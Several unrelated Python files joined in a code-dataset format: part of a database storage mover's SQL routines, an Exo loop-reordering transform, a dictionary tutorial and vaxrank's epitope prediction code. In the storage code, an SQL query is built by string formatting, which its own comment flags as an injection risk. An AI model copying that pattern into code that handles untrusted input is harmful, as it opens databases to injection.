res = {}
_stmt = self._current_object_tids_query
oids = list(oids)
while oids:
# XXX: Dangerous (SQL injection)! And probably slow. Can we do better?
oid_list = ','.join(str(oid) for oid in oids[:1000])
del oids[:1000]
stmt = _stmt % (oid_list,)
cursor.execute(stmt)
for oid, tid in fetchmany(cursor):
res[oid] = tid
return res
#: A sequence of *names* of attributes on this object that are statements to be
#: executed by ``on_store_opened`` when ``restart`` is False.
on_store_opened_statement_names = ()
def on_store_opened(self, cursor, restart=False):
if not restart:
for stmt_name in self.on_store_opened_statement_names:
cursor.execute(getattr(self, stmt_name))
#: A sequence of *names* of attributes on this object that are statements to be
#: executed by ``on_store_opened`` when ``restart`` is False.
on_load_opened_statement_names = ()
def on_load_opened(self, cursor, restart=False):
if not restart:
for stmt_name in self.on_load_opened_statement_names:
cursor.execute(getattr(self, stmt_name))
def _generic_store_temp(self, batcher, oid, prev_tid, data,
command='INSERT', suffix=''):
md5sum = self._compute_md5sum(data)
if command == 'INSERT' and not suffix:
# MySQL uses command=REPLACE for an UPSERT
# PostgreSQL 9.5+ uses a suffix='ON CONFLICT UPDATE...' for an UPSERT
batcher.delete_from('temp_store', zoid=oid)
batcher.insert_into(
"temp_store (zoid, prev_tid, md5, state)",
"%s, %s, %s, %s",
(oid, prev_tid, md5sum, self.Binary(data)),
rowkey=oid,
size=len(data),
command=command,
suffix=suffix
)
def store_temp(self, cursor, batcher, oid, prev_tid, data):
raise NotImplementedError()
@metricmethod_sampled
def _generic_restore(self, batcher, oid, tid, data, command='INSERT'):
"""Store an object directly, without conflict detection.
Used for copying transactions into this database.
"""
md5sum = self._compute_md5sum(data)
if data is not None:
encoded = self.Binary(data)
size = len(data)
else:
encoded = None
size = 0
if self.keep_history:
if command == 'INSERT':
batcher.delete_from("object_state", zoid=oid, tid=tid)
row_schema = """
%s, %s,
COALESCE((SELECT tid FROM current_object WHERE zoid = %s), 0),
%s, %s, %s
"""
batcher.insert_into(
"object_state (zoid, tid, prev_tid, md5, state_size, state)",
row_schema,
(oid, tid, oid, md5sum, size, encoded),
rowkey=(oid, tid),
size=size,
command=command,
)
else:
if data:
if command == 'INSERT':
batcher.delete_from('object_state', zoid=oid)
batcher.insert_into(
"object_state (zoid, tid, state_size, state)",
"%s, %s, %s, %s",
(oid, tid, size, encoded),
rowkey=oid,
size=size,
command=command,
)
else:
batcher.delete_from('object_state', zoid=oid)
def restore(self, cursor, batcher, oid, tid, data):
raise NotImplementedError()
# careful with USING clause in a join: Oracle doesn't allow such
# columns to have a prefix.
_detect_conflict_queries = (
"""
SELECT zoid, current_object.tid, temp_store.prev_tid
FROM temp_store
JOIN current_object USING (zoid)
WHERE temp_store.prev_tid != current_object.tid
""",
"""
SELECT zoid, object_state.tid, temp_store.prev_tid
FROM temp_store
JOIN object_state USING (zoid)
WHERE temp_store.prev_tid != object_state.tid
"""
)
_detect_conflict_query = _query_property('_detect_conflict')
@metricmethod_sampled
def detect_conflict(self, cursor):
"""Find all conflicts in the data about to be committed.
If there is a conflict, returns a sequence of (oid, prev_tid, attempted_prev_tid).
"""
stmt = self._detect_conflict_query
cursor.execute(stmt)
rows = cursor.fetchall()
return rows
@metricmethod_sampled
def replace_temp(self, cursor, oid, prev_tid, data):
"""Replace an object in the temporary table.
This happens after conflict resolution.
"""
md5sum = self._compute_md5sum(data)
stmt = """
UPDATE temp_store SET
prev_tid = %s,
md5 = %s,
state = %s
WHERE zoid = %s
"""
cursor.execute(stmt, (prev_tid, md5sum, self.Binary(data), oid))
# Subclasses may override any of these queries if there is a
# more optimal form.
_move_from_temp_hp_insert_query = """
INSERT INTO object_state
(zoid, tid, prev_tid, md5, state_size, state)
SELECT zoid, %s, prev_tid, md5,
COALESCE(LENGTH(state), 0), state
FROM temp_store
"""
_move_from_temp_hf_insert_query = """
INSERT INTO object_state (zoid, tid, state_size, state)
SELECT zoid, %s, COALESCE(LENGTH(state), 0), state
FROM temp_store
"""
_move_from_temp_copy_blob_query = """
INSERT INTO blob_chunk (zoid, tid, chunk_num, chunk)
SELECT zoid, %s, chunk_num, chunk
FROM temp_blob_chunk
"""
_move_from_temp_hf_delete_blob_chunk_query = """
DELETE FROM blob_chunk
WHERE zoid IN (SELECT zoid FROM temp_store)
"""
def _move_from_temp_object_state(self, cursor, tid):
"""
Called for history-free databases.
Should replace all entries in object_state with the
same zoid from temp_store.
"""
stmt = """
DELETE FROM object_state
WHERE zoid IN (SELECT zoid FROM temp_store)
"""
cursor.execute(stmt)
stmt = self._move_from_temp_hf_insert_query
cursor.execute(stmt, (tid,))
@metricmethod_sampled
def move_from_temp(self, cursor, tid, txn_has_blobs):
"""Moved the temporarily stored objects to permanent storage.
Returns the list of oids stored.
"""
if self.keep_history:
stmt = self._move_from_temp_hp_insert_query
cursor.execute(stmt, (tid,))
else:
self._move_from_temp_object_state(cursor, tid)
if txn_has_blobs:
cursor.execute(self._move_from_temp_hf_delete_blob_chunk_query)
if txn_has_blobs:
stmt = self._move_from_temp_copy_blob_query
cursor.execute(stmt, (tid,))
stmt = """
SELECT zoid FROM temp_store
"""
cursor.execute(stmt)
return [oid for (oid,) in fetchmany(cursor)]
_update_current_insert_query = """
INSERT INTO current_object (zoid, tid)
SELECT zoid, tid FROM object_state
WHERE tid = %s
AND prev_tid = 0"""
_update_current_update_query = """
UPDATE current_object SET tid = %s
WHERE zoid IN (
SELECT zoid FROM object_state
WHERE tid = %s
AND prev_tid != 0
ORDER BY zoid)
"""
@noop_when_history_free
@metricmethod_sampled
def update_current(self, cursor, tid):
"""
Update the current object pointers.
tid is the integer tid of the transaction being committed.
"""
stmt = self._update_current_insert_query
cursor.execute(stmt, (tid,))
# Change existing objects. To avoid deadlocks,
# update in OID order.
stmt = self._update_current_update_query
cursor.execute(stmt, (tid, tid))
@metricmethod_sampled
def download_blob(self, cursor, oid, tid, filename):
"""Download a blob into a file."""
raise NotImplementedError()
def upload_blob(self, cursor, oid, tid, filename):
"""Upload a blob from a file.
If serial is None, upload to the temporary table.
"""
raise NotImplementedError()
|
StarcoderdataPython
|
176439
|
from __future__ import annotations
from cmath import cos
import sys
from exo import proc, Procedure, DRAM, config, instr, QAST
from matmap.base import *
from matmap.qast_utils.loopReader import *
from itertools import dropwhile
class ReorderingTransform(Transform):
#loop bounds are a ForLoop object
#tile_bounds is a dict mapping names from the ForLoop to numbers
def __init__(self, loop_order):
self.loop_order = loop_order
def apply(self, fn, backend="exo"):
def get_loop_order(obj):
loops = readLoopNest(obj)[0]
loop_list = []
for loop in loops:
loop_list.append(loop.name)
return loop_list
loop_dict = {}
to_list = []
num = 0
for i in self.loop_order:
loop_dict[num] = i
to_list.append(num)
num += 1
given_list = []
new_dict = {value : key for (key, value) in loop_dict.items()}
for i in get_loop_order(fn):
given_list.append(new_dict[i])
#sort values and swap elements
n = len(given_list)
for i in range(n):
for j in range(n - 1):
if given_list[j] > given_list[j+1]:
fn = fn.reorder(loop_dict[given_list[j]], loop_dict[given_list[j+1]])
given_list[j], given_list[j+1] = given_list[j+1], given_list[j]
return fn
|
StarcoderdataPython
|
69274
|
import sys
# Application for working with dictionaries
# dictionaries: building, indexing, adding and removing keys, iterating through dictionaries
# as well as their keys and values, checking key existence, keys(), items() and values() methods
sample = {'home': '123 Main street', 'office': '22 Baker Street', 'bill': '1 Financial Way'}
print(sample)
print(sample.keys())
print(sample.values())
print("\nAccess Item.\n")
print(sample['home'])
print(sample.get('home'))
print(sample.get('red'))
for key in sample.keys():
print(key + " address is " + sample.get(key))
sample['home'] = "4321 lonesome range"
print(sample)
sample['vacation'] = "1 Sunshine Avenue"
print(sample)
print("\nFrom Blank\n")
blank = {}
blank["A"] = "Apple"
print(blank)
blank["B"] = "Banana"
print(blank)
print("\nDictionary items\n")
print(sample.items())
print("\nDictionary pop\n")
print(sample.pop('vacation'))
print(sample)
sample2 = sample.copy()
for item in sample.items():
print("Next pair is " + str(item))
print("\nDictionary popitem\n")
print(sample.popitem())
print(sample)
print(sample.popitem())
print(sample)
sample.clear()
print(sample)
print(sample2)
if sample2['home']:
print("That key exists")
if sample2.get('blue'):
print("That key exists")
else:
print("That key does not exist")
print(len(sample2))
print("\nApplication Ended.\n")
|
StarcoderdataPython
|
3389848
|
<reponame>shah-newaz/vaxrank<gh_stars>0
# Copyright (c) 2016-2018. Mount Sinai School of Medicine
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import, print_function, division
from collections import namedtuple, OrderedDict
import traceback
import logging
import numpy as np
from .reference_proteome import ReferenceProteome
logger = logging.getLogger(__name__)
EpitopePredictionBase = namedtuple("EpitopePrediction", [
"allele",
"peptide_sequence",
"wt_peptide_sequence",
"length",
"ic50",
"el_score",
"wt_ic50",
"wt_el",
"percentile_rank",
"prediction_method_name",
"overlaps_mutation",
"source_sequence",
"offset",
"occurs_in_reference",
])
class EpitopePrediction(EpitopePredictionBase):
def logistic_epitope_score(
self,
midpoint=350.0,
width=150.0,
el_score_cut_off=10.0): # TODO: add these default values into CLI as arguments
"""
Map from IC50 values to score where 1.0 = strong binder, 0.0 = weak binder
Default midpoint and width for logistic determined by max likelihood fit
for data from <NAME>'s 1994 paper:
"The relationship between class I binding affinity
and immunogenicity of potential cytotoxic T cell epitopes.
TODO: Use a large dataset to find MHC binding range predicted to #
correlate with immunogenicity
"""
if self.percentile_rank >= el_score_cut_off:
return 0.0
return self.el_score
def predict_epitopes(
mhc_predictor,
protein_fragment,
min_epitope_score=0.0,
genome=None):
"""
Parameters
----------
mhc_predictor : mhctools.BasePredictor
Object with predict_peptides method
protein_fragment : MutantProteinFragment
peptide_length : list of int
Lengths of peptides to make pMHC binding predictions for
min_epitope_score : float
Ignore peptides with binding predictions whose normalized score is less
than this.
genome : pyensembl.Genome
Genome whose proteome to use for reference peptide filtering
Returns an OrderedDict of EpitopePrediction objects, keyed by a
(peptide sequence, allele) tuple, that have a normalized score greater
than min_epitope_score.
Uses the input genome to evaluate whether the epitope occurs in reference.
"""
results = OrderedDict()
reference_proteome = ReferenceProteome(genome)
# sometimes the predictors will fail, and we don't want to crash vaxrank in that situation
# TODO: make more specific or remove when we fix error handling in mhctools
try:
mhctools_binding_predictions = mhc_predictor.predict_subsequences(
{protein_fragment.gene_name: protein_fragment.amino_acids})
except:
logger.error(
'MHC prediction errored for protein fragment %s, with traceback: %s',
protein_fragment, traceback.format_exc())
return results
# compute the WT epitopes for each mutant fragment's epitopes; mutant -> WT
wt_peptides = {}
for binding_prediction in mhctools_binding_predictions:
peptide = binding_prediction.peptide
peptide_length = binding_prediction.length
peptide_start_offset = binding_prediction.offset
peptide_end_offset = peptide_start_offset + peptide_length
overlaps_mutation = protein_fragment.interval_overlaps_mutation(
start_offset=peptide_start_offset,
end_offset=peptide_end_offset)
if overlaps_mutation:
full_reference_protein_sequence = (
protein_fragment.predicted_effect().original_protein_sequence
)
global_epitope_start_pos = (
protein_fragment.global_start_pos() + peptide_start_offset
)
wt_peptide = full_reference_protein_sequence[
global_epitope_start_pos:global_epitope_start_pos + peptide_length]
wt_peptides[peptide] = wt_peptide
wt_predictions = []
try:
# filter to minimum peptide lengths
valid_wt_peptides = [
x for x in wt_peptides.values() if len(x) >= mhc_predictor.min_peptide_length
]
if len(valid_wt_peptides) > 0:
wt_predictions = mhc_predictor.predict_peptides(valid_wt_peptides)
except:
logger.error(
'MHC prediction for WT peptides errored, with traceback: %s',
traceback.format_exc())
wt_predictions_grouped = {}
# break it out: (peptide, allele) -> prediction
for wt_prediction in wt_predictions:
wt_predictions_grouped[(wt_prediction.peptide, wt_prediction.allele)] = wt_prediction
# convert from mhctools.BindingPrediction objects to EpitopePrediction
# which differs primarily by also having a boolean field
# 'overlaps_mutation' that indicates whether the epitope overlaps
# mutant amino acids or both sides of a deletion
num_total = 0
num_occurs_in_reference = 0
num_low_scoring = 0
for binding_prediction in mhctools_binding_predictions:
num_total += 1
peptide = binding_prediction.peptide
peptide_length = binding_prediction.length
peptide_start_offset = binding_prediction.offset
peptide_end_offset = peptide_start_offset + peptide_length
overlaps_mutation = protein_fragment.interval_overlaps_mutation(
start_offset=peptide_start_offset,
end_offset=peptide_end_offset)
occurs_in_reference = reference_proteome.contains(peptide)
if occurs_in_reference:
logger.debug('Peptide %s occurs in reference', peptide)
num_occurs_in_reference += 1
# compute WT epitope sequence, if this epitope overlaps the mutation
if overlaps_mutation:
wt_peptide = wt_peptides[peptide]
wt_prediction = wt_predictions_grouped.get((wt_peptide, binding_prediction.allele))
wt_ic50 = None
wt_el = None
if wt_prediction is None:
# this can happen in a stop-loss variant: do we want to check that here?
if len(wt_peptide) < mhc_predictor.min_peptide_length:
logger.info(
'No prediction for too-short WT epitope %s: possible stop-loss variant',
wt_peptide)
else:
wt_ic50 = wt_prediction.value
wt_el = wt_prediction.percentile_rank
else:
wt_peptide = peptide
wt_ic50 = binding_prediction.value
wt_el = binding_prediction.percentile_rank
epitope_prediction = EpitopePrediction(
allele=binding_prediction.allele,
peptide_sequence=peptide,
wt_peptide_sequence=wt_peptide,
length=len(peptide),
ic50=binding_prediction.value,
el_score=binding_prediction.score,
wt_ic50=wt_ic50,
wt_el=wt_el,
percentile_rank=binding_prediction.percentile_rank,
prediction_method_name=binding_prediction.prediction_method_name,
overlaps_mutation=overlaps_mutation,
source_sequence=protein_fragment.amino_acids,
offset=peptide_start_offset,
occurs_in_reference=occurs_in_reference)
if epitope_prediction.logistic_epitope_score() >= min_epitope_score:
key = (epitope_prediction.peptide_sequence, epitope_prediction.allele)
results[key] = epitope_prediction
else:
num_low_scoring += 1
logger.info(
"%d total peptides: %d occur in reference, %d failed score threshold",
num_total,
num_occurs_in_reference,
num_low_scoring)
return results
def slice_epitope_predictions(
epitope_predictions,
start_offset,
end_offset):
"""
Return subset of EpitopePrediction objects which overlap the given interval
and slice through their source sequences and adjust their offset.
"""
return [
EpitopePrediction(
allele=p.allele,
peptide_sequence=p.peptide_sequence,
wt_peptide_sequence=p.wt_peptide_sequence,
length=p.length,
ic50=p.ic50,
el_score=p.el_score,
wt_ic50=p.wt_ic50,
wt_el=p.wt_el,
percentile_rank=p.percentile_rank,
prediction_method_name=p.prediction_method_name,
overlaps_mutation=p.overlaps_mutation,
source_sequence=p.source_sequence[start_offset:end_offset],
offset=p.offset - start_offset,
occurs_in_reference=p.occurs_in_reference)
for p in epitope_predictions
if p.offset >= start_offset and p.offset + p.length <= end_offset
]
|
StarcoderdataPython
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.